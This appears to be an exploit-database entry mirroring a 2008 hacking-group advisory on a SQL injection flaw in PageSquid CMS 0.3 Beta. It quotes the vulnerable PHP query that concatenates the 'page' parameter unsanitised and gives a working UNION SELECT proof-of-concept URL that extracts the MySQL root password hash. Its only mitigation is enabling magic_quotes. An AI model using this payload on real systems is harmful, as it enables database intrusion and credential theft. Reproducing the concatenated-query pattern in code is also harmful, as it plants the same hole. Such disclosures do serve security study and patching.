header-logo
Suggest Exploit
vendor:
PageSquid CMS
by:
CWH Underground
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: PageSquid CMS
Affected Version From: 0.3 Beta
Affected Version To: 0.3 Beta
Patch Exists: No
Related CWE: N/A
CPE: a:pagesquid:pagesquid_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PageSquid CMS (index.php page) Remote SQL Injection Vulnerability

A vulnerability exists in PageSquid CMS 0.3 Beta, where an attacker can inject arbitrary SQL commands via the 'page' parameter in the index.php page. Magic_quote must be turned off for the exploit to work. An example of the exploit is http://192.168.24.25/pagesquid/index.php?page=3'/**/AND/**/1=2/**/UNION/**/SELECT/**/1,Password,3,4/**/FROM/**/mysql.user/**/WHERE/**/User='root

Mitigation:

Ensure that the 'magic_quote' setting is turned on in the php.ini configuration file.
Source

Exploit-DB raw data:

=====================================================================
  PageSquid CMS (index.php page) Remote SQL Injection Vulnerability
=====================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 22 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : PageSquid CMS
 VERSION     : 0.3 Beta
 DOWNLOAD    : http://downloads.sourceforge.net/pagesquid
#####################################################

--- Remote SQL Injection Exploit ---

**Magic_quote must turn off**

-----------------------------------
 Vulnerable File [index.php?page=]
-----------------------------------

@Line 5

   4:  if (isset($_GET['page'])) {
   5:		$result = mysql_fetch_array(mysql_query("SELECT  * FROM pages WHERE page_id='" . $_GET['page'] . "'"));
   6:  } else {
   7:		$result = mysql_fetch_array(mysql_query("SELECT  * FROM pages WHERE page_order='1'"));
   8:  }

---------
 Exploit
---------
[+] http://[Target]/[pagesquid_path]/index.php?page=[SQL Injection]


-------------
 POC Exploit
-------------

[+] http://192.168.24.25/pagesquid/index.php?page=3'/**/AND/**/1=2/**/UNION/**/SELECT/**/1,Password,3,4/**/FROM/**/mysql.user/**/WHERE/**/User='root


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-22]